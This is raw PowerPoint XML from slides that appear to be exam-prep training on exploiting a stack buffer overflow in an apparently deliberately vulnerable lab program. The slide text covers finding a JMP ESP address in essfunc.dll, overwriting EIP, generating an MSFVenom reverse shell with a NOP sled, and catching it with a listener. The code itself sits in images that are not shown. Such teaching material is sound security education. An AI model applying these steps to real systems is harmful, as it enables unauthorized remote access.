      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137911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AB28312-05FA-4099-8CB1-65AA620BFBD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335360" y="1343823"/>
            <a:ext cx="11377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Note: This example requires JMP ESP. More complex cases may rely on finding other registers to use, like EAX. The goal is to find a way to execute the memory location with your shell code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52D22824-8739-4CB7-8CF7-888510C7FBFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335360" y="2621059"/>
            <a:ext cx="108012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Search the modules for a JMP ESP address that doesn’t contain the bad characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52FE8D54-1738-477C-A3E7-C54668554F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6023645" y="4798502"/>
            <a:ext cx="5715000" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D7DCC5F-847C-43D7-8429-73CD204C6332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="335360" y="3754371"/>
            <a:ext cx="11534775" cy="1485900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1824EF1F-AFDE-4C54-9754-E9B5719FE5BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6636060" y="5949280"/>
            <a:ext cx="1872208" cy="228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7102BFD2-EF15-4520-84B4-200B44284B2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019436" y="4579392"/>
            <a:ext cx="1872208" cy="228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12DBAC2D-2DCE-47A1-ABAA-3494C0C809CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380934" y="5571007"/>
            <a:ext cx="50669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In this case, we use the essfunc.dll and we can pick any of the memory addresses. Write it down (0x625011af)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C53F4905-9E89-408A-8F5D-2B9AF7D4B2AA}"/>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Find a JMP ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1037577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5EECAF-A1D5-4C56-A380-F335C017B727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="335360" y="1216578"/>
            <a:ext cx="8286750" cy="5133975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BE1A244-9686-423E-BBD5-F2199A3977C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4863963" y="4687788"/>
            <a:ext cx="6524625" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D0EA12-65A3-4E68-86D0-6949575A7B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4835860" y="4689140"/>
            <a:ext cx="2988332" cy="1814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84CA0757-E075-40BA-A516-9295BC586D47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8832304" y="2118613"/>
            <a:ext cx="282417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Go to the assembly instruction pane and enter the memory location of JMP ESP. Hit F2 to toggle a breakpoint</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D61C119-215F-4C8D-A343-3D93A97A4B8E}"/>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Set a Breakpoint on JMP ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2523899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9891B4-D60B-4A78-9E12-86C8340B2299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="314324" y="1150512"/>
            <a:ext cx="3943350" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{443A4E4B-1B13-4CFD-8DBB-60F97B7067A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7818236" y="3422419"/>
            <a:ext cx="3776366" cy="1065130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8A901BB-E399-41F7-BF0A-CC1758C46292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8264548" y="4622954"/>
            <a:ext cx="3084726" cy="2019596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB28312-05FA-4099-8CB1-65AA620BFBD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319224" y="1193589"/>
            <a:ext cx="67449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Add the JMP ESP address IN REVERSE ORDER to the EIP variable (for more: read up on endian-ness). Also add 500 D’s to simulate a payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30284BA6-F5F9-4E65-8ADA-07056A910D42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="267880" y="4292997"/>
            <a:ext cx="5631004" cy="1344830"/>
            <a:chOff x="803412" y="3311540"/>
            <a:chExt cx="5631004" cy="1344830"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DD3C1D6-B8E7-49F3-AB04-B5E19B59A502}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="803412" y="3311540"/>
              <a:ext cx="5069538" cy="696169"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78464748-6133-4583-80A1-ECE6BCE6F7E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="865950" y="4170748"/>
              <a:ext cx="5568466" cy="485622"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1824EF1F-AFDE-4C54-9754-E9B5719FE5BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1595500" y="5248376"/>
            <a:ext cx="4104456" cy="3450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0148E1B0-BC06-441B-A7D5-00F37398C6A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3863712" y="5825025"/>
            <a:ext cx="3270161" cy="904876"/>
            <a:chOff x="251132" y="5800866"/>
            <a:chExt cx="3270161" cy="904876"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Picture 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1BF238B-4D42-4069-9C9C-E3E9559E3EC9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="330418" y="5800866"/>
              <a:ext cx="3190875" cy="904875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3592762-896E-416E-8934-EDFF41DEB94E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="251132" y="6454988"/>
              <a:ext cx="2712520" cy="250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356E4E16-F2AD-4303-8682-4AB31E703226}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303315" y="5936271"/>
              <a:ext cx="3217977" cy="250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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7971E011-57F9-4D69-AFC3-D2EBE1800EF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7572164" y="3155550"/>
            <a:ext cx="0" cy="3636404"/>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E14DF21-E26C-4A18-80B8-8F13F9E2C0BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="83890" y="5908555"/>
            <a:ext cx="3437629" cy="790575"/>
            <a:chOff x="3822350" y="5986797"/>
            <a:chExt cx="3437629" cy="790575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACD47D9D-2751-43EB-B8ED-BF88FBCED3D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3850029" y="5986797"/>
              <a:ext cx="3409950" cy="790575"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1F6B6BF-788C-4D5D-9FDC-9094D21834B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3822350" y="6204233"/>
              <a:ext cx="1877606" cy="250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5" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA8EAE48-8BC8-4444-A543-6A5BCCCBF2F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7805982" y="2411004"/>
            <a:ext cx="38170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Step once with F7 and you should see the program jump to our dummy payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1E742E-27EF-47E5-9E6B-0BFDC2CB3982}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="236676" y="1878084"/>
            <a:ext cx="2422634" cy="328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AF7B45B7-FC19-42D0-8CF6-F06CF82D5E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="117770" y="3064024"/>
            <a:ext cx="543723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The program should pause when you hit the breakpoint after running the exploit, you can see the JMP ESP is in the EIP and the ESP is pointing to our dummy payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C5AC86-69B0-4F39-933B-C272D58D43E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6576232" y="4426437"/>
            <a:ext cx="1824024" cy="1398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5BAF4A6-DFEF-467B-969B-B31386ACF283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1463530" y="4622954"/>
            <a:ext cx="2401501" cy="18077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itle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE23FF68-9E79-46C5-B346-187D5ED9E976}"/>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Test out the JMP ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16450843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ED0EAA-09B8-4495-AC38-16E12F71EDDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="195174" y="2460928"/>
            <a:ext cx="11655272" cy="2804276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA28D562-6C79-4EAE-865B-7B6E03642BF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195174" y="1422686"/>
            <a:ext cx="116552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Use </a:t>
            </a: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MSFVenom</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 generate a reverse shell. IMPORTANT: Use EXITFUNC=thread to ensure the program continues operating after the payload. If you don’t do this on the exam and it doesn’t work, you’ll need to reset the box which wastes time.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E0A4441-F088-4A0A-A5C9-F9CC771EFB99}"/>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Generate a Payload (for real)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365958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22C0A8-6D5D-46A0-BC56-A8EF6F3B5252}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93460" y="1230868"/>
            <a:ext cx="1118013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Put the payload in the exploit with a NOP (No Operation, 0x90) sled of about 20. This is important because the encoder can sometimes adjust the memory prior to the payload which will cause it to fail. Set up a listener, and enjoy your access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8546EE6A-A7F3-41BB-88B7-976A906B71F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="335360" y="2154198"/>
            <a:ext cx="7515225" cy="2838450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8DC0C33-CDE0-4811-B892-A54B550B3757}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6852084" y="3826135"/>
            <a:ext cx="5200650" cy="1543050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20F5517D-217C-46AA-9F55-FA8D3DD3931D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312967" y="5239703"/>
            <a:ext cx="3638550" cy="1352550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8059146C-9B1F-4B14-BCE8-86F6B13554B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5051884" y="5904771"/>
            <a:ext cx="6588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Program is still running after getting a shell</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itle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19A7BD9C-240C-42E7-A2B0-A695A4837822}"/>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POC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4845689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22C0A8-6D5D-46A0-BC56-A8EF6F3B5252}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
